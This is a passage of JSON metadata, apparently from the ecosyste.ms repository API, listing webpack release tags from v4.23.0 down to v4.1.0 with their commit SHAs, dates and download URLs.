k/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879